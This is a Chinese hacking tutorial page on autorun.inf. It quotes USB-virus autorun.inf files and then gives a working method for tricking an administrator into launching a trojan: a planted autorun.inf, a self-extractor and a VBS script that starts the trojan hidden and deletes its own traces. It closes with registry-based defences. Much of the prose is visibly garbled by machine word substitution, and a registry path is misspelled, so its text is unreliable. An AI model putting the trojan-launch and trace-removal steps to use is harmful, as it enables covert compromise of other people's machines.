Autorun.inf的新写法与利用以及防备[菜鸟入门]

首先是autorun.inf
普通的病毒的Autorun.inf文件内容为
[autorun]
open=.\RECYCLER\RECYCLER\autorun.exe
shell\1=Open
shell\1\Command=.\RECYCLER\RECYCLER\autorun.exe
shell\2\=Browser
shell\2\Command=.\RECYCLER\RECYCLER\autorun.exe
shellexecute=.\RECYCLER\RECYCLER\autorun.exe
它的效果是当双击翻开盘时.会运行RECYCLER\RECYCLER\autorun.exe文件,用右键翻开,会显示Open,Browser.
还有一种是
[autorun]
OPEN=SVCH0ST.EXE
shell\open=翻开(&O)
shell\open\Command=SVCH0ST.EXE
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=SVCH0ST.EXE
关于这种U盘病毒,无论右键挑选“翻开”还是“资源管理器”病毒城市运行.
一种操纵autorun.inf提权的办法（转）
从前看过很多关于AutoRun.inf的操纵文章,网上满是千篇一概,彼此模拟.我再来添点东西吧~

还是先简单说下原理吧.写一个AutoRun.inf文件,放在对方某一盘符下,当管理员双击此盘时,就会履行AutoRun.inf指定的文件了.普通用在入侵

时没有运行权限时,拐骗管理员帮你运行..

从前我在网上看到的都是一个情势

[AutoRun]

open = 你想运行的程序

先不说这样运行是不是成功的,略微想一下,就知道有问题,人家管理员不是傻子,这样双击是打不开盘符的,人家必定知道出问题了,所以你玩不

长的..

事实上那个文件在我机子是运行不起的,网上也没找到办理办法,相信还有很多人和我碰到过一样的问题,求人不如求已,自己搞定吧.

也不难,只要这样写就OK了:

[AutoRun]
open=AutoRun.exe
shellexecute=AutoRun.exe
shell\Auto\command=AutoRun.exe

这样,你把它保存为一个.inf文件,放在C盘下,AutoRun.exe为你指定的运行程序.这样双击C盘便可以成功运行了.前面还说过一个问题,就是C盘

打不开,很简单就被管理员发现了,有待改良.下来就说怎么办理这个问题,GO ON!

其实这个实现起来也不难,先把AutoRun.inf上传至对方C盘,我们可以做一个自解压包,也放在C盘根目录下,让他成为我们的指定运行文件,里面

包含我们要运行的程序,比方木马,还一个VBS脚本,自解压包履行后先让他履行VBS脚本,内容以下:

set yu=wscript.createobject("wscript.shell")
yu.run "cmd /c start WINLOG0N.exe",0
yu.run "cmd /c del AutoRun.inf",0
yu.run "cmd /c start c:\",0
yu.run "cmd /c del AutoRun.vbs",0

我再简单注释下,解压后VBS帮我们运行winlogon.exe(我配置好的木马),然后删掉AutoRun.inf,为什么要删掉它,第一,削减被发现的机会,二,删

掉它,管理员重启机子或注销后假如右键点击盘复符不会呈现"播放",一切恢复中马前的状况,当然之前我们的木马已经运行了.第四行代码: 我

们为他翻开C盘,最后再删掉vbs脚本自身.

这样改良后个人认为安全性大大提高了.呵呵..各位在测试的时刻只须把上面脚本中的 WINLOG0N.exe改成自己的木马便可以了.winxp sp2下测

试成功.
防治办法
其实这个文件不是病毒.也是用来翻开病毒了.防治它的思绪有两种:一是禁用自动播放,二是删除它,三是禁止它生成.
1.在Windows系统有答应和禁止自动运行的键值的办法:

　　 在注册表中找到以下键:

键途径:[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer]

在右侧窗格中有 "NoDriveTypeAutoRun"这个键决意了能否履行Autorun功效.此中每一位代表一个设备,差别设备用以下数值表示:

设备名称 第几位 值 设备用以下数值表示 设备名称含义
DRIVE_UNKNOWN 0 1 01h 不能辨认的范例设备
DRIVE_NO_ROOT_DIR 1 0 02h 没有根目录的驱动器
DRIVE_REMOVABLE 2 1 04h 可移动驱动器
DRIVE_FIXED 3 0 08h 固定的驱动器
DRIVE_REMOTE 4 1 10h 网络驱动器
DRIVE_CDROM 5 0 20h 光驱
DRIVE_RAMDISK 6 0 40h RAM磁盘

此中: 保存 7 1 80h 　未指定的驱动器范例

以上值"0"表示设备运行,"1"表示设备不运行.
从上面可以看出,对应的DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK是可以自动运行的.所以要禁止硬盘自动运行

AutoRun.inf文件,就必须将DRIVE_FIXED这些键的值设为1,由于DRIVE_FIXED代表固定的驱动器(即硬盘).假如仅想禁止软件光盘的AutoRun功

能,但又保存对CD音频碟的自动播放本领,这时只需将“NoDriveTypeAutoRun”的键值改成:BD,00,00,00便可.

[1] [2] [3]  下一页